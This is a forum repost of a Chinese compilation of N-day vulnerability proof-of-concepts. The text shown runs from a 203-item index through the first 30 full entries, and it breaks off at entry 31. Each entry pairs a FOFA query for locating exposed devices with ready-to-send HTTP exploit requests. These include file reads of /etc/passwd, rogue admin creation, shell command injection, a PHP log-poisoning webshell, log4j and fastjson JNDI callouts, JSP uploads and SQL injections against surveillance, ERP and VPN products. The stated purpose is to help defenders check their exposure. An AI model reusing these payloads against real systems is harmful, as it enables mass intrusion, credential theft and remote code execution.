中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06 (repost)

Author: admin    Time: 2024-6-5 14:31

Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全 (Daoyi Security), 2024-06-05 07:41, Beijing
The following article comes from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities accounts for a large share of the attack techniques seen in offensive/defensive engagements; we hope this article is of some help to defenders. Defenders can use its contents to check their own exposure.

Source: the article covers 203 POCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024, all taken from other public accounts or websites on the internet and compiled and published by the 网络安全新视界 team.

Patches: all of these are public vulnerabilities; for patches or remediation, contact the product vendor.

Content: because of length constraints, a few POCs that are too long have been replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Notice

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it, or follow the public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice Yiweiyun (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
65. Youkate (优卡特) Lianaiyun face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. Suda Tianyao (速达天耀) software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. Sifudi (思福迪) LOGBASE O&M security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. DBAPPSecurity (安恒) Mingyu security gateway aaa_local_web_preview file upload
88. DBAPPSecurity (安恒) Mingyu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin Netshen (网神) SecGate3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin Netshen (网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun (科立迅) communications command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun (科立讯) communications command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun (科立讯) communications command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun (科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun (建科立讯) communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. Tianweier (天维尔) fire and rescue dispatch platform SQL injection
155. 六零导航页 navigation page file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. Meite (美特) CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Infinitt (英飞达) medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
164. Huixiaoyuan (慧校园 / 安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
167. Lean (精益) value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing (宏景) EHR downlawbase SQL injection
170. Hongjing (宏景) EHR DisplayExcelCustomReport arbitrary file read
171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher (金和) OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. Jianwen (建文) engineering management system arbitrary file read
180. Bangguanke (帮管客) CRM jiliyu SQL injection
181. Runshen (润申科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang (图创) library cluster management system updOpuserPw SQL injection
184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友) Tianyi application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
189. Lanwang (蓝网科技) clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. ESAFENET (亿赛通) electronic document security management system NavigationAjax SQL injection
192. Futong Tianxia (富通天下) foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) Yunjian security management system setsystemtimeaction command execution
194. Feiqi Hulian (飞企互联) FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) internet behavior management system send_order.cgi command execution
196. Henan Fengsu (风速科技) unified authentication platform password reset
197. Zheda Ente (浙大恩特) customer resource management system Quotegask_editAction SQL injection
198. Aliyundrive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. Honghaiyun (红海云) EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin panel with the default admin account, perform the following operation:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-1 login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: the POST request, which writes the execution function; the command it runs is passed base64-encoded.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice Yiweiyun (医微云) SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-Type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
